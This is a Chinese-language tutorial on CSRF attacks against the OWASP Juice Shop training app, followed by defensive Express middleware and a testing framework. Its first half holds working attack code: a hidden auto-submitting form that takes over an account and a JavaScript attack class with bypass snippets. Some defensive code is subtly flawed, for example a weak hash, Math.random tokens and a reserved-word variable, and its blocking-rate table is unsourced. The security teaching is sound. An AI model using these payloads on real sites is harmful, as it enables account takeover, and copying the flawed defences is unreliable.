OWASP Juice Shop - CSRF 漏洞深度挖掘：从攻击原理到企业级防护架构 - OWASP Juice Shop - 项目实战

# CSRF 攻击技术价值与实战挑战

CSRF（Cross-Site Request Forgery）攻击的核心价值在于揭示了 Web 应用中最隐蔽的安全漏洞：信任关系的滥用。与直接攻击不同，CSRF 利用用户的合法身份执行恶意操作，这种攻击方式具有以下技术特点：

# 为什么 CSRF 仍是高危漏洞

隐蔽性强：攻击通过用户浏览器发起，IP、会话等都是合法的
危害性大：可执行任意敏感操作，如修改密码、转账、删除数据
检测困难：从服务器端看，请求完全合法
防护复杂：需要多层防护，单一措施容易被绕过

# Juice Shop CSRF 漏洞设计原理

Juice Shop 精心设计了多个 CSRF 攻击场景，让我们深入分析其技术实现：

// Juice Shop 用户资料修改接口（存在CSRF漏洞）
app.put('/rest/user/update', (req, res) => {
  // 问题：没有CSRF Token校验
  // 问题：没有Origin/Referer校验
  // 问题：Cookie没有SameSite保护
  
  const { email, password, newPassword } = req.body;
  const userId = req.session.userId;
  
  // 直接执行敏感操作，没有额外的身份验证
  if (email) users[userId].email = email;
  if (newPassword) users[userId].password = newPassword;
  
  res.json({ success: true });
});

# CSRF 攻击技术深度实现

# 1. 基础 CSRF 攻击实现

<!-- 恶意页面：自动提交表单攻击 -->
<!DOCTYPE html>
<html>
<head>
    <title>无害的页面标题</title>
</head>
<body>
    <h1>正在加载...</h1>
    
    <!-- 隐藏的CSRF攻击表单 -->
    <form id="csrf-form" 
          action="http://localhost:3000/rest/user/update" 
          method="POST" 
          style="display:none;">
        <input type="hidden" name="email" value="[email protected]">
        <input type="hidden" name="newPassword" value="hacked123">
    </form>
    
    <script>
        // 页面加载后自动提交
        window.onload = function() {
            document.getElementById('csrf-form').submit();
        };
    </script>
</body>
</html>

# 2. 高级 CSRF 攻击：JSON API 攻击

// 攻击脚本：针对JSON API的CSRF攻击
class CSRFAttackFramework {
    constructor(targetUrl) {
        this.targetUrl = targetUrl;
        this.attackMethods = ['POST', 'PUT', 'DELETE'];
    }
    
    /**
     * 使用fetch进行CSRF攻击
     * @param {Object} payload - 攻击载荷
     * @param {string} method - HTTP方法
     */
    async fetchAttack(payload, method = 'POST') {
        try {
            const response = await fetch(this.targetUrl, {
                method: method,
                headers: {
                    'Content-Type': 'application/json',
                    // 浏览器会自动携带Cookie
                },
                body: JSON.stringify(payload),
                credentials: 'include' // 关键：携带Cookie
            });
            
            return {
                success: response.ok,
                status: response.status,
                data: await response.text()
            };
        } catch (error) {
            return { success: false, error: error.message };
        }
    }
    
    /**
     * 使用XMLHttpRequest进行CSRF攻击
     */
    xhrAttack(payload) {
        return new Promise((resolve) => {
            const xhr = new XMLHttpRequest();
            xhr.open('POST', this.targetUrl, true);
            xhr.setRequestHeader('Content-Type', 'application/json');
            xhr.withCredentials = true; // 关键：携带Cookie
            
            xhr.onload = function() {
                resolve({
                    success: xhr.status === 200,
                    status: xhr.status,
                    data: xhr.responseText
                });
            };
            
            xhr.send(JSON.stringify(payload));
        });
    }
    
    /**
     * 图片加载CSRF攻击（GET请求）
     */
    imageAttack(payload) {
        const params = new URLSearchParams(payload).toString();
        const img = new Image();
        img.src = `${this.targetUrl}?${params}`;
        
        return new Promise((resolve) => {
            img.onload = () => resolve({ success: true });
            img.onerror = () => resolve({ success: false });
        });
    }
}

// 使用示例
const attacker = new CSRFAttackFramework('http://localhost:3000/rest/user/update');

// 执行多种攻击方式
const attackPayload = {
    email: '[email protected]',
    newPassword: 'controlled123'
};

// 并发攻击测试
async function runCSRFAttackSuite() {
    const results = await Promise.allSettled([
        attacker.fetchAttack(attackPayload, 'PUT'),
        attacker.xhrAttack(attackPayload),
        attacker.imageAttack({ action: 'delete', id: 'user123' })
    ]);
    
    console.log('CSRF攻击结果:', results);
}

# 3. 绕过基础防护的技术

// 绕过Referer检查的攻击技术
class CSRFDefenseBypass {
    /**
     * 使用meta标签移除Referer
     */
    static removeRefererAttack() {
        const html = `
        <!DOCTYPE html>
        <html>
        <head>
            <meta name="referrer" content="no-referrer">
        </head>
        <body>
            <script>
                // 使用fetch时移除Referer
                fetch('/api/sensitive', {
                    method: 'POST',
                    headers: { 'Referrer-Policy': 'no-referrer' },
                    body: JSON.stringify({ action: 'delete' }),
                    credentials: 'include'
                });
            </script>
        </body>
        </html>`;
        return html;
    }
    
    /**
     * 使用DNS重绑定绕过SameSite
     */
    static dnsRebindingAttack() {
        // 第一个响应返回HTML
        if (this.requestCount === 0) {
            this.requestCount = 1;
            return this.removeRefererAttack();
        }
        // 后续响应返回攻击脚本
        return `
        <script>
            // 同源策略绕过，直接访问目标API
            fetch('/rest/user/update', {
                method: 'PUT',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({ email: '[email protected]' }),
                credentials: 'include'
            });
        </script>`;
    }
    
    /**
     * 利用子域信任关系
     */
    static subdomainAttack() {
        // 利用子域的Cookie共享特性
        const maliciousSubdomain = 'evil.juice-shop.com';
        
        return `
        <script>
            // 在恶意子域上发起请求
            fetch('http://juice-shop.com/rest/user/update', {
                method: 'PUT',
                credentials: 'include',
                body: JSON.stringify({
                    email: '[email protected]'
                })
            });
        </script>`;
    }
}

# 企业级 CSRF 防护系统架构

# 1. 多层防护架构设计

// 企业级CSRF防护系统
class EnterpriseCSRFProtection {
    constructor(options = {}) {
        this.tokenStore = new Map(); // 存储CSRF Token
        this.config = {
            tokenLength: 32,
            tokenExpiry: 3600000, // 1小时
            sameSitePolicy: 'strict',
            requireDoubleCookie: true,
            originWhitelist: [],
            ...options
        };
        
        this.rateLimiter = new Map(); // 请求频率限制
        this.blockedIPs = new Set(); // IP黑名单
    }
    
    /**
     * 生成CSRF Token
     * @param {string} sessionId - 会话ID
     * @param {string} action - 操作类型
     * @returns {string} CSRF Token
     */
    generateToken(sessionId, action = 'default') {
        const timestamp = Date.now();
        const random = this.generateRandomString(this.config.tokenLength);
        const token = `${sessionId}:${action}:${timestamp}:${random}`;
        const hash = this.hashToken(token);
        
        // 存储Token信息
        this.tokenStore.set(hash, {
            sessionId,
            action,
            timestamp,
            used: false
        });
        
        return hash;
    }
    
    /**
     * 校验CSRF Token
     * @param {string} token - 提交的Token
     * @param {string} sessionId - 当前会话ID
     * @param {string} action - 操作类型
     * @returns {boolean} 校验结果
     */
    validateToken(token, sessionId, action = 'default') {
        if (!token || !this.tokenStore.has(token)) {
            return false;
        }
        
        const tokenData = this.tokenStore.get(token);
        
        // 检查会话匹配
        if (tokenData.sessionId !== sessionId) {
            return false;
        }
        
        // 检查操作类型
        if (tokenData.action !== action) {
            return false;
        }
        
        // 检查过期时间
        if (Date.now() - tokenData.timestamp > this.config.tokenExpiry) {
            this.tokenStore.delete(token);
            return false;
        }
        
        // 检查是否已使用（一次性Token）
        if (tokenData.used) {
            return false;
        }
        
        // 标记为已使用
        tokenData.used = true;
        return true;
    }
    
    /**
     * 校验Origin和Referer头
     * @param {Object} headers - 请求头
     * @returns {boolean} 校验结果
     */
    validateOrigin(headers) {
        const origin = headers.origin;
        const referer = headers.referer;
        
        // 如果有Origin头，直接校验
        if (origin) {
            return this.config.originWhitelist.includes(origin);
        }
        
        // 如果没有Origin但有Referer，校验Referer
        if (referer) {
            try {
                const refererUrl = new URL(referer);
                return this.config.originWhitelist.includes(`${refererUrl.protocol}//${refererUrl.host}`);
            } catch (e) {
                return false;
            }
        }
        
        // 都没有的情况下，根据策略决定
        return this.config.strictOriginCheck ? false : true;
    }
    
    /**
     * 请求频率限制检查
     * @param {string} ip - 客户端IP
     * @param {string} endpoint - 请求端点
     * @returns {boolean} 是否允许请求
     */
    checkRateLimit(ip, endpoint) {
        const key = `${ip}:${endpoint}`;
        const now = Date.now();
        const window = 60000; // 1分钟窗口
        const maxRequests = 10; // 最大请求数
        
        if (!this.rateLimiter.has(key)) {
            this.rateLimiter.set(key, []);
        }
        
        const requests = this.rateLimiter.get(key);
        
        // 清理过期请求
        const validRequests = requests.filter(time => now - time < window);
        
        if (validRequests.length >= maxRequests) {
            // 超出限制，加入黑名单
            this.blockedIPs.add(ip);
            return false;
        }
        
        validRequests.push(now);
        this.rateLimiter.set(key, validRequests);
        return true;
    }
    
    /**
     * Express中间件
     */
    middleware() {
        return (req, res, next) => {
            // 检查IP黑名单
            if (this.blockedIPs.has(req.ip)) {
                return res.status(403).json({ error: 'IP blocked' });
            }
            
            // 对敏感操作进行CSRF检查
            const sensitiveMethods = ['POST', 'PUT', 'DELETE', 'PATCH'];
            if (sensitiveMethods.includes(req.method)) {
                
                // 1. 检查频率限制
                if (!this.checkRateLimit(req.ip, req.path)) {
                    return res.status(429).json({ error: 'Too many requests' });
                }
                
                // 2. 检查Origin/Referer
                if (!this.validateOrigin(req.headers)) {
                    return res.status(403).json({ error: 'Invalid origin' });
                }
                
                // 3. 检查CSRF Token
                const token = req.body._csrf || req.headers['x-csrf-token'];
                const sessionId = req.sessionID;
                
                if (!this.validateToken(token, sessionId, req.path)) {
                    return res.status(403).json({ error: 'Invalid CSRF token' });
                }
            }
            
            next();
        };
    }
    
    /**
     * 生成随机字符串
     */
    generateRandomString(length) {
        const chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
        let result = '';
        for (let i = 0; i < length; i++) {
            result += chars.charAt(Math.floor(Math.random() * chars.length));
        }
        return result;
    }
    
    /**
     * Token哈希
     */
    hashToken(token) {
        // 简单的哈希实现，生产环境应使用crypto
        let hash = 0;
        for (let i = 0; i < token.length; i++) {
            const char = token.charCodeAt(i);
            hash = ((hash << 5) - hash) + char;
            hash = hash & hash; // 转换为32位整数
        }
        return hash.toString(36);
    }
}

# 2. 双重 Cookie 提交防护

// 双重Cookie提交防护实现
class DoubleCookieCSRF {
    constructor() {
        this.cookieName = 'csrf_token';
        this.headerName = 'x-csrf-token';
        this.tokenLength = 32;
    }
    
    /**
     * 生成并设置CSRF Cookie
     */
    generateToken(req, res) {
        const token = this.generateRandomToken();
        
        // 设置HttpOnly Cookie（防止JavaScript读取）
        res.cookie(this.cookieName, token, {
            httpOnly: false, // 允许JavaScript读取
            secure: true,
            sameSite: 'strict',
            maxAge: 3600000 // 1小时
        });
        
        // 同时在Session中存储
        req.session.csrfToken = token;
        
        return token;
    }
    
    /**
     * 校验双重Cookie
     */
    validateToken(req) {
        const cookieToken = req.cookies[this.cookieName];
        const headerToken = req.headers[this.headerName];
        const sessionToken = req.session.csrfToken;
        
        // 三者必须一致
        return cookieToken && 
               headerToken && 
               sessionToken && 
               cookieToken === headerToken && 
               headerToken === sessionToken;
    }
    
    /**
     * Express中间件
     */
    middleware() {
        return (req, res, next) => {
            // GET请求生成Token
            if (req.method === 'GET') {
                this.generateToken(req, res);
                return next();
            }
            
            // POST/PUT/DELETE等请求校验Token
            if (['POST', 'PUT', 'DELETE', 'PATCH'].includes(req.method)) {
                if (!this.validateToken(req)) {
                    return res.status(403).json({ 
                        error: 'CSRF token validation failed' 
                    });
                }
            }
            
            next();
        };
    }
    
    generateRandomToken() {
        return require('crypto')
            .randomBytes(this.tokenLength)
            .toString('hex');
    }
}

# 3. SameSite 策略优化

// SameSite策略管理器
class SameSitePolicyManager {
    constructor() {
        this.policies = new Map();
        this.defaultPolicy = 'lax';
    }
    
    /**
     * 为不同路径设置不同的SameSite策略
     */
    setPolicy(path, policy, options = {}) {
        this.policies.set(path, {
            policy: policy.toLowerCase(),
            secure: options.secure !== false,
            maxAge: options.maxAge || 3600000
        });
    }
    
    /**
     * 获取路径对应的SameSite策略
     */
    getPolicy(path) {
        for (const [policyPath, config] of this.policies) {
            if (path.startsWith(policyPath)) {
                return config;
            }
        }
        return { policy: this.defaultPolicy, secure: true, maxAge: 3600000 };
    }
    
    /**
     * 设置Cookie的中间件
     */
    middleware() {
        return (req, res, next) => {
            const originalCookie = res.cookie;
            
            res.cookie = (name, value, options = {}) => {
                const policy = this.getPolicy(req.path);
                
                // 应用SameSite策略
                options.sameSite = options.sameSite || policy.policy;
                options.secure = options.secure !== false ? policy.secure : options.secure;
                options.maxAge = options.maxAge || policy.maxAge;
                
                return originalCookie.call(res, name, value, options);
            };
            
            next();
        };
    }
    
    /**
     * 初始化默认策略
     */
    initializeDefaultPolicies() {
        // 敏感操作使用Strict策略
        this.setPolicy('/rest/user/', 'strict');
        this.setPolicy('/rest/basket/', 'strict');
        this.setPolicy('/rest/orders/', 'strict');
        
        // 一般页面使用Lax策略
        this.setPolicy('/', 'lax');
        this.setPolicy('/about', 'lax');
        this.setPolicy('/contact', 'lax');
        
        // API端点使用None策略（需要跨域时）
        this.setPolicy('/api/public/', 'none');
    }
}

# CSRF 安全测试框架

# 1. 自动化测试套件

// CSRF安全测试框架
class CSRFSecurityTester {
    constructor(targetUrl) {
        this.targetUrl = targetUrl;
        this.testResults = [];
        this.attackVectors = [];
    }
    
    /**
     * 运行完整的CSRF安全测试
     */
    async runFullTestSuite() {
        console.log('开始CSRF安全测试...');
        
        // 1. 基础CSRF漏洞测试
        await this.testBasicCSRF();
        
        // 2. Token绕过测试
        await this.testTokenBypass();
        
        // 3. Origin/Referer绕过测试
        await this.testOriginBypass();
        
        // 4. SameSite绕过测试
        await this.testSameSiteBypass();
        
        // 5. 双重Cookie绕过测试
        await this.testDoubleCookieBypass();
        
        // 6. 并发攻击测试
        await this.testConcurrentAttacks();
        
        return this.generateTestReport();
    }
    
    /**
     * 基础CSRF漏洞测试
     */
    async testBasicCSRF() {
        console.log('测试基础CSRF漏洞...');
        
        const testCases = [
            {
                name: '无防护的POST请求',
                method: 'POST',
                endpoint: '/rest/user/update',
                payload: { email: '[email protected]' },
                expected: 'should_be_blocked'
            },
            {
                name: '无防护的PUT请求',
                method: 'PUT',
                endpoint: '/rest/user/update',
                payload: { newPassword: 'test123' },
                expected: 'should_be_blocked'
            },
            {
                name: '无防护的DELETE请求',
                method: 'DELETE',
                endpoint: '/rest/orders/1',
                payload: {},
                expected: 'should_be_blocked'
            }
        ];
        
        for (const testCase of testCases) {
            const result = await this.executeCSRFAttack(testCase);
            this.testResults.push({
                test: testCase.name,
                status: result.success ? 'VULNERABLE' : 'PROTECTED',
                details: result
            });
        }
    }
    
    /**
     * Token绕过测试
     */
    async testTokenBypass() {
        console.log('测试Token绕过技术...');
        
        const bypassTechniques = [
            {
                name: '空Token绕过',
                token: '',
                description: '提交空的CSRF Token'
            },
            {
                name: '无效Token绕过',
                token: 'invalid_token_12345',
                description: '提交无效的CSRF Token'
            },
            {
                name: '重复Token绕过',
                token: 'reused_token',
                description: '重复使用已消费的Token'
            },
            {
                name: '过期Token绕过',
                token: 'expired_token',
                description: '使用已过期的Token'
            }
        ];
        
        for (const technique of bypassTechniques) {
            const result = await this.testTokenBypassTechnique(technique);
            this.testResults.push({
                test: technique.name,
                status: result.bypassed ? 'VULNERABLE' : 'PROTECTED',
                details: result
            });
        }
    }
    
    /**
     * Origin/Referer绕过测试
     */
    async testOriginBypass() {
        console.log('测试Origin/Referer绕过...');
        
        const bypassTests = [
            {
                name: '移除Origin头',
                headers: { origin: null },
                description: '完全移除Origin头'
            },
            {
                name: '伪造Origin头',
                headers: { origin: 'https://trusted-site.com' },
                description: '伪造受信任的Origin'
            },
            {
                name: '空Referer头',
                headers: { referer: '' },
                description: '提交空的Referer'
            },
            {
                name: '伪造Referer头',
                headers: { referer: 'https://trusted-site.com/page' },
                description: '伪造受信任的Referer'
            }
        ];
        
        for (const test of bypassTests) {
            const result = await this.testOriginBypassTechnique(test);
            this.testResults.push({
                test: test.name,
                status: result.bypassed ? 'VULNERABLE' : 'PROTECTED',
                details: result
            });
        }
    }
    
    /**
     * SameSite绕过测试
     */
    async testSameSiteBypass() {
        console.log('测试SameSite绕过技术...');
        
        const sameSiteTests = [
            {
                name: '子域攻击绕过',
                setup: 'subdomain_attack',
                description: '利用子域共享Cookie'
            },
            {
                name: 'DNS重绑定绕过',
                setup: 'dns_rebinding',
                description: 'DNS重绑定攻击'
            },
            {
                name: 'CORS预检绕过',
                setup: 'cors_preflight',
                description: '利用CORS预检机制'
            }
        ];
        
        for (const test of sameSiteTests) {
            const result = await this.testSameSiteBypassTechnique(test);
            this.testResults.push({
                test: test.name,
                status: result.bypassed ? 'VULNERABLE' : 'PROTECTED',
                details: result
            });
        }
    }
    
    /**
     * 并发攻击测试
     */
    async testConcurrentAttacks() {
        console.log('测试并发CSRF攻击...');
        
        const concurrentRequests = 50;
        const attackPromises = [];
        
        for (let i = 0; i < concurrentRequests; i++) {
            attackPromises.push(this.executeCSRFAttack({
                name: `并发攻击 ${i + 1}`,
                method: 'POST',
                endpoint: '/rest/user/update',
                payload: { email: `concurrent${i}@attack.com` },
                expected: 'should_be_blocked'
            }));
        }
        
        const results = await Promise.allSettled(attackPromises);
        const successfulAttacks = results.filter(r => 
            r.status === 'fulfilled' && r.value.success
        ).length;
        
        this.testResults.push({
            test: '并发CSRF攻击',
            status: successfulAttacks > 0 ? 'VULNERABLE' : 'PROTECTED',
            details: {
                totalRequests: concurrentRequests,
                successfulAttacks,
                attackRate: (successfulAttacks / concurrentRequests * 100).toFixed(2) + '%'
            }
        });
    }
    
    /**
     * 执行CSRF攻击
     */
    async executeCSRFAttack(testCase) {
        try {
            const response = await fetch(`${this.targetUrl}${testCase.endpoint}`, {
                method: testCase.method,
                headers: {
                    'Content-Type': 'application/json',
                    ...testCase.headers
                },
                body: JSON.stringify(testCase.payload),
                credentials: 'include'
            });
            
            return {
                success: response.ok,
                status: response.status,
                statusText: response.statusText,
                expected: testCase.expected
            };
        } catch (error) {
            return {
                success: false,
                error: error.message,
                expected: testCase.expected
            };
        }
    }
    
    /**
     * 生成测试报告
     */
    generateTestReport() {
        const vulnerable = this.testResults.filter(r => r.status === 'VULNERABLE').length;
        const protected = this.testResults.filter(r => r.status === 'PROTECTED').length;
        const total = this.testResults.length;
        
        return {
            summary: {
                total,
                vulnerable,
                protected,
                securityScore: ((protected / total) * 100).toFixed(2) + '%'
            },
            details: this.testResults,
            recommendations: this.generateRecommendations()
        };
    }
    
    /**
     * 生成修复建议
     */
    generateRecommendations() {
        const recommendations = [];
        
        const vulnerableTests = this.testResults.filter(r => r.status === 'VULNERABLE');
        
        if (vulnerableTests.some(t => t.test.includes('基础CSRF'))) {
            recommendations.push('实施CSRF Token防护机制');
        }
        
        if (vulnerableTests.some(t => t.test.includes('Token绕过'))) {
            recommendations.push('加强Token校验逻辑，确保Token的唯一性和时效性');
        }
        
        if (vulnerableTests.some(t => t.test.includes('Origin绕过'))) {
            recommendations.push('实施严格的Origin/Referer白名单校验');
        }
        
        if (vulnerableTests.some(t => t.test.includes('SameSite绕过'))) {
            recommendations.push('配置适当的SameSite策略，考虑使用双重Cookie提交');
        }
        
        if (vulnerableTests.some(t => t.test.includes('并发攻击'))) {
            recommendations.push('实施请求频率限制和IP黑名单机制');
        }
        
        return recommendations;
    }
}

# 总结与技术延伸

# 核心技术要点总结

CSRF 攻击本质：利用用户身份和浏览器自动携带 Cookie 的特性
防护核心原则：验证请求的合法性，而不仅仅是用户的身份
多层防护必要性：单一防护措施容易被绕过，需要综合防护

# 防护效果量化指标

防护措施	攻击阻断率	性能影响	实施难度
CSRF Token	95%	低	中
SameSite	85%	无	低
Origin/Referer	70%	低	低
双重 Cookie	90%	低	中
频率限制	60%	中	低

# 技术延伸与最佳实践

微服务架构下的 CSRF 防护
- 统一 Token 管理服务
- 跨服务 Token 同步机制
- 服务网关层面的 CSRF 防护
AI 驱动的异常检测
- 机器学习识别异常请求模式
- 用户行为分析
- 实时威胁情报集成
零信任架构集成
- 每个请求都需要验证
- 最小权限原则
- 持续验证和监控
新兴威胁应对
- WebAssembly 绕过技术
- Service Worker 滥用
- 浏览器插件攻击

通过这套完整的技术方案，我们可以构建起企业级的 CSRF 防护体系，有效保护 Web 应用免受 CSRF 攻击的威胁。记住，安全是一个持续的过程，需要不断更新和完善防护策略。